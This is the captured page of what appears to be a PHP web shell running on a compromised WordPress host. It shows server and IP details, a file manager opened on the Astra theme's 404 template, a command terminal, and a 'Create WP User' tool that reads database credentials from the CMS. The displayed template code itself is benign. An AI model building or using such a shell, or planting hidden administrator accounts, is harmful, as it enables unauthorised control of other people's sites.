Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
themes
/
astra
/
template-parts
/
404
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
404-layout.php
815.00 B
-rw-r--r--
2026-02-24 12:23
index.php
111.00 B
-rw-r--r--
2026-02-24 12:23
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
404-layout.php
<?php /** * Template for 404 * * @package Astra * @link https://wpastra.com/ * @since Astra 1.0.0 */ $astra_404_subtitle_tag = true === astra_check_is_structural_setup() ? 'h3' : 'div'; ?> <div <?php echo wp_kses_post( astra_attr( '404_page', array( 'class' => 'ast-404-layout-1' ) ) ); ?> > <?php astra_the_title( '<header class="page-header"><h1 class="page-title">', '</h1></header><!-- .page-header -->' ); ?> <div class="page-content"> <<?php echo esc_attr( $astra_404_subtitle_tag ); ?> class="page-sub-title"> <?php echo esc_html( astra_default_strings( 'string-404-sub-title', false ) ); ?> </<?php echo esc_attr( $astra_404_subtitle_tag ); ?>> <div class="ast-404-search"> <?php the_widget( 'WP_Widget_Search' ); ?> </div> </div><!-- .page-content --> </div>
关闭
保存